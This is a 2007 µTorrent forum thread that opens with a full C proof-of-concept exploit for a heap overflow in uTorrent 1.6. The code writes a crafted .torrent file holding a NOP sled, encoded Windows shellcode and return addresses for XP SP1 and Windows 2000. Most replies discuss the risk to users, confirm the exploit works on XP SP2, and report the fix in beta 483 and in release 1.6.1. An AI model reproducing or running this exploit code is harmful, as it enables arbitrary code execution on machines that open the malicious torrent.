µTorrent Community
You are not logged in.
/*
* This is a PoC remote exploit for uTorrent 1.6
*
* Author:
* defsec <defacedsecurity@hotmail.com>
* http://www.defacedsecurity.com
*
*
* Works on XP SP1 and w2k sp1-4
*
*/
#include <stdio.h>
#include <stdlib.h>
#define NASIZE 4880
unsigned char nice_announce[NASIZE];
unsigned char xorops[]="\x33\xc0\x33\xdb";
// win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum
// Restricted Character 0x00
unsigned char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x41\x4b\x48"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x36\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x47\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x46\x42\x30\x5a";
//msvcrt.dll pop,pop,ret addr all xp sp1 exchange it with 0x7801D07B for win2k sp3/sp4
unsigned char jmptosc[] = "\xeb\x04\
\xa7\x2c\xc2\x77\
\x33\xc0\xb0\x11\xc1\xe0\x08\x5b\x5b\x5b\x2b\xd8\xff\xe3";
int main(int argc,char *argv[])
{
FILE * pFile;
long lSize;
char * buffer;
size_t result;
long i = 0;
long j = 0;
long lPtrIndex;
long lHeadSize;
long lTailSize;
char * curptr;
char * alptr;
char * torrentTail;
if (argc < 2)
{
printf("\n[uTorrent 1.6] Heap Overflow Exploit - by [DEFACEDSECURITY]");
printf("\n\nUsage: ");
printf("%s",argv[0]);
printf(" <TorrentFile>\n");
return 0;
}
pFile = fopen (argv[1],"rb");
if (pFile==NULL)
{
fputs ("File error",stderr);
return 0;
}
// obtain file size:
fseek (pFile ,0,SEEK_END);
lSize = ftell (pFile);
rewind (pFile);
// allocate memory to contain the whole file:
buffer = (char*) malloc (sizeof(char)*lSize);
if (buffer == NULL)
{
fputs ("Memory error",stderr);
return 0;
}
// copy the file into the buffer:
result = fread (buffer,1,lSize,pFile);
if (result != lSize)
{
fputs ("Reading error",stderr);
return 0;
}
fclose (pFile);
/* find announce / announce-list and erase it */
alptr = (char *) strstr(buffer,"announce");
if (alptr == NULL)
{
printf("\ninvalid torrent file");
return 0;
}
curptr = (char *) strstr(alptr, "7:comment");
lHeadSize = curptr - buffer;
lTailSize = lSize - lHeadSize;
torrentTail = (char *) malloc (sizeof(char)*lTailSize);
memcpy(torrentTail,curptr,lTailSize);
/* generate offending header */
strcpy(nice_announce,"d8:announce4864:");
for (lPtrIndex = 16; lPtrIndex <= 4864+16; lPtrIndex++)
nice_announce[lPtrIndex] = 0x90;
lPtrIndex = 84;
memcpy(nice_announce + lPtrIndex ,xorops,sizeof(xorops)-1);
lPtrIndex += sizeof(xorops) -1;
memcpy(nice_announce+lPtrIndex,shellcode, sizeof(shellcode)-1);
for (lPtrIndex = 4438; lPtrIndex<4458; lPtrIndex++,i++)
nice_announce[lPtrIndex] = jmptosc[i];
/* get head and tail together into a file */
curptr = (char *) malloc(sizeof(char)*(NASIZE+lTailSize));
for (i=0;i<NASIZE;i++)
curptr[i] = nice_announce[i];
for (;i<(NASIZE+lTailSize);i++,j++)
curptr[i] = torrentTail[j];
/* write to file and exit */
pFile = fopen ( "output.torrent" , "wb" );
if (pFile==NULL)
{
fputs ("File error",stderr);
return 0;
}
fwrite(curptr, sizeof(char), (NASIZE+lTailSize), pFile);
fclose (pFile);
return 1337; //:)
}Just a heads up.
Last edited by FLX (2007-02-12 16:32:41)
Offline
Yah, previously reported on the IRC channel ;\
Just for clarification, it's an exploit that makes use of specifically-engineered .torrent files with corrupt dictionaries, and is not a remote security issue. What does it mean for users? Until a fix is implemented, be careful where you get your .torrent files from -- that's all. Do realize that if you're not sure you can trust all of your RSS feeds, disable them for the time being (so to prevent µTorrent from autoloading malicious .torrent files).
Offline
Does it allow for arbitrary code execution? Does this one work on XP SP2?
Offline
"Koepi" (who first informed us on the channel) tested it on SP2, and supposedly, it did work. ^^inf^^ also confirmed it to be working. Not sure about arbitrary code execution though.
Offline
This is an easy fix. Thanks for the report.
Offline
I already saw a arbitrary code execution and a local privilege escalation poc where im from. But this is the only one that has been made public. Said to be working on win2000, xp sp1 and xp sp2.
Offline
is it fixed already in last beta (483)?
Offline
Yes, ludde fixed it months ago in 483.
http://download.utorrent.com/beta/utorr … ld-483.exe for those who don't have the link.
Offline
It begs the question, why has the beta version not been added to the download page yet? It's been the most recent, and fully stable, version for at least the past what, 3 months?
edit: Added to the download page as a beta, that is, since obviously it is a "beta"... betas USED to be added to the download page!
Last edited by Falcon4 (2007-02-13 18:33:09)
Offline
Latest Version: µTorrent 1.6.1 Stable build 488
Download: http://download.utorrent.com/1.6.1/utorrent.exe
Changelog: http://download.utorrent.com/1.6.1/utorrent-1.6.1.txt
Offline
I understand that. <_<
This. There used to be a beta download there. It's a bitch to scour the forums for that one topic with the download link in it when I want to grab the beta... v.v
Offline
Oh my post wasn't actually a response so much as it was an update 
I'm not sure why it's not on the front page yet, but I guess they're waiting to update the automatic update server. Or something.
Offline
I see... sorry 
But yeah... it's bugged me for a long time that the beta was never added to the download page 
Offline
Dunno, I kinda prefer that betas are linked to from the forum anyway -- it kinda encourages people to visit the forum and report bugs should any pop up.
Offline
Most betas usually were, but b483 was intended to be with the webui only.
Offline
I wouldn't have even known there was a beta if I hadn't already been active in the forums... I think of the forums as the place to, as you said, report bugs... but the main site as the place to get official betas and releases... =\
Perhaps if they would link people - from the download page - to the forum topic about the beta... that would work well too. *shrug*
Hey, if the new 1.6.1 is coming out soon, all the better! I think it may have fixed my UPnP problem too, I dunno
Offline
1.6.1 already came out <_< it'll be on the main page later
Offline
I... did... sorta... post... a link... up above 
Offline
Wull yeah but.
Offline
1.6.1 is still not on the download page : http://www.utorrent.com/download.php
There is also not a single word about the exploit on the front page.
Last edited by xerces8 (2007-02-14 02:44:38)
Offline
Firon said "Later" .
...
Offline
Thank the new guy in charge for that delay!
Bram Cohen
BitTorrent™ Inc.
Edit: I talk about the downloadpage since yesterday!
Last edited by µtorrent-Guest (2007-02-14 10:45:51)
Offline
What piece of the story are we missing that "months" went by before the version of the program that the vast majority of the people know about and use (as opposed to a silent beta that was supposed to be only for the webui interface) was actually updated?
Was the exploit not public until this week? Was it maybe unconfirmed until this week that SP2 was vulnerable, thereby reducing the urgency to release the fix?
Offline
beta 483 wasn't vulnerable to the issue and it was released last year. Ludde actually unintentionally fixed it when some stuff was rewritten, so it just wasn't known that there was an exploit in the first place.
Offline
